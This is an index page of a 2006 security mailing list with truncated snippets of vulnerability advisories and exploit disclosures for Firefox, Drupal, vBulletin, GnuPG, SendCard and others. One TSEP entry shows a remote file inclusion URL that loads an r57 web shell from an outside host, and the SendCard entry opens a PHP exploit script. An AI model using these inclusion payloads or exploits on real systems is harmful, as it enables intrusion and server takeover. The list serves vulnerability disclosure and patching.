|
|
Colapse all |
Post message
[ GLSA 200608-03 ] Mozilla Firefox: Multiple vulnerabilities 2006-08-03 Thierry Carrez (koon gentoo org) [DRUPAL-SA-2006-011] Drupal 4.7.3 / 4.6.9 fixes XSS issue 2006-08-03 Uwe Hermann (uwe hermann-uwe de) vbulletin 3.5.4 IE exploit xss 2006-08-03 stefan dakotacom net --------------------------- XSS vbulletin 3.5.4 With IE --------------------------- Author:Stefan Group: EnigmaGroup --------------------------- This is XSS that only works using IE By Saving malicous code as a .pdf and uploading as a attchment on a post. when the attachment is viewed in IE [ more ] [ reply ] SolpotCrew Advisory #5 - modernbill ver 1.6 (DIR) Remote File Inclusion 2006-08-03 chris_hasibuan yahoo com #############################SolpotCrew Community################################ # # modernbill ver 1.6 (DIR) Remote File Inclusion # # Download file : http://freshmeat.net/projects/modernbill/ # ######################################################################## ######### # # [ more ] [ reply ] [SECURITY] [DSA 1140-1] New GnuPG packages fix denial of service 2006-08-03 joey infodrom org (Martin Schulze) [ GLSA 200608-02 ] Mozilla SeaMonkey: Multiple vulnerabilities 2006-08-03 Stefan Cornelius (dercorny gentoo org) Javascript software authentication brute force attack 2006-08-03 Gianstefano Monni (gianstefano lugnu it) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 0. HISTORICAL CONSIDERATIONS Nowadays it's very easy to have a virtual server with (for instance) mysql and php or any other sort of server-side authentication system, but some time ago many people were trying to use some kinds of client-authenticatio [ more ] [ reply ] [SECURITY] [DSA 1139-1] New ruby1.6 packages fix privilege escalation 2006-08-03 Moritz Muehlenhoff (jmm debian org) [USN-332-1] gnupg vulnerability 2006-08-03 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-332-1 August 03, 2006 gnupg vulnerability CVE-2006-3746 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.04 Ubuntu 5.10 Ubu [ more ] [ reply ] [USN-331-1] Linux kernel vulnerabilities 2006-08-03 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-331-1 August 03, 2006 linux-source-2.6.15 vulnerabilities CVE-2006-2934, CVE-2006-2935, CVE-2006-2936 =========================================================== A security issue affects the following [ more ] [ reply ] SendCard <= 3.4.0 unauthorized administrative access / remote commands execution 2006-08-03 rgod autistici org #!/usr/bin/php -q -d short_open_tag=on <? echo "SendCard <= 3.4.0 unauthorized administrative access / remote commands\n"; echo "execution exploit\n"; echo "by rgod rgod (at) autistici (dot) org [email concealed]\n"; echo "site: http://retrogod.altervista.org\n"; echo "dork: \"Powered by sendcard - an advanced PHP e-card [ more ] [ reply ] Secunia Research: PC Tools AntiVirus Insecure Default DirectoryPermissions 2006-08-03 Secunia Research (remove-vuln secunia com) Vwar v1.5.0 <= Sql Injection and XSS vuln. 2006-08-03 mfoxhacker gmail com IHST > Iran HackerZ Security Team (WhiteHat Part) ------------------------------------------------- Vendor : www.vwar.de vuln. Version = v1.5.0 and lower Credits : MFox Contact : mfoxhacker (at) gmail (dot) com [email concealed] HomePage : www.hackerz.ir ------------------------------------------------- Proof of Concept [ more ] [ reply ] [MajorSecurity Advisory #27]ToendaCMS - Cross Site Scripting Issue 2006-08-03 admin majorsecurity de [MajorSecurity Advisory #27]ToendaCMS - Cross Site Scripting Issue Details ======= Product: Toenda CMS Affected Version: <=1.0.3(stable) and 1.1 Immune Version: None known Security-Risk: low Remote-Exploit: yes Vendor-URL: http://www.toenda.com/ Vendor-Status: informed Advisory-Status: p [ more ] [ reply ] TSEP <= 0.942 Remote File Include 2006-08-02 beford (xbefordx gmail com) Script: TSEP <= 0.942 URL: www.tsep.info Discovered: beford <xbefordx gmail com> Comments: "register_globals" must be enabled duh. document.this != http://www.milw0rm.com/exploits/2098 Vulnerable Files/Code: ./tsep.0942/include/colorswitch.php?tsep_config[absPath]=http://rst.void .ru/download/r57sh [ more ] [ reply ] Simpliciti Locked Browser Jail Breakout Vulnerability 2006-08-02 EvilPacket (evilpacket gmail com) Simpliciti Locked Browser Jail Breakout Vulnerability ESRL Discovery Date: March 20, 2006 Discovery By: Adam Baldwin (adam_baldwin (at) evilpacket (dot) net [email concealed]) Versions Effected: All versions Background: Simpliciti Locked Browser is a product that provides "no-programming required PC lockdown..." functionalit [ more ] [ reply ] [security bulletin] HPSBUX02087 SSRT4728 rev.3 - HP-UX running TCP/IP Remote Denial of Service (DoS) 2006-08-02 security-alert hp com -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00579189 Version: 3 HPSBUX02087 SSRT4728 rev.3 - HP-UX running TCP/IP Remote Denial of Service (DoS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. [ more ] [ reply ] Hobbit monitor security bugfix release - 4.1.2p2 2006-08-02 henrik hswn dk (Henrik Stoerner) Version 4.1.2p2 of Hobbit has just been uploaded to SourceForge, and is available at http://sourceforge.net/project/showfiles.php?group_id=128058&package_id= 140220&release_id=436594 This release fixes a security bug reported by Jason Kruse earlier today: File access via the Hobbit "config" method f [ more ] [ reply ] OZJournal v1.5 - XSS 2006-08-02 luny youfucktard com OZJournal v1.5 Homepage: http://ozjournals.awardspace.com/index.php Affected files: search input box index.php viewing archives show comment page ---------------------------------------- XSS vulnerability via search input box: Data isn't properly sanatized before being displayed. F [ more ] [ reply ] [security bulletin] HPSBUX02124 SSRT061159 rev.1 - HP-UX Sendmail MIME Remote Denial of Service (DoS) 2006-08-02 security-alert hp com -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00680632 Version: 1 HPSBUX02124 SSRT061159 rev.1 - HP-UX Sendmail MIME Remote Denial of Service (DoS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. [ more ] [ reply ] [security bulletin] HPSBGN02136 SSRT061173 rev.1 - ProCurve Series 3500yl, 6200yl, and 5400zl Switches Running Software Prior to K.11.33 Remote Denial of Service (DoS) 2006-08-02 security-alert hp com -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00732233 Version: 1 HPSBGN02136 SSRT061173 rev.1 - ProCurve Series 3500yl, 6200yl, and 5400zl Switches Running Software Prior to K.11.33 Remote Denial of Service (DoS) NOTICE: The information i [ more ] [ reply ] [SECURITY] [DSA 1136-1] New gpdf packages fix denial of service 2006-08-02 joey infodrom org (Martin Schulze) [security bulletin] HPSBUX02108 SSRT061133 rev.13 - HP-UX Running Sendmail, Remote Execution of Arbitrary Code 2006-08-02 security-alert hp com -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00629555 Version: 13 HPSBUX02108 SSRT061133 rev.13 - HP-UX Running Sendmail, Remote Execution of Arbitrary Code NOTICE: The information in this Security Bulletin should be acted upon as soon as [ more ] [ reply ] |
|
Privacy Statement |
+
+ ME Download System 1.3 Remote File Inclusion
+
+--------------------------------------------------------------------
+
+ Affected Software .: ME Download System 1.3
+ Venedor ...........: http://www.ehmig.net/
+ Class
[ more ] [ reply ]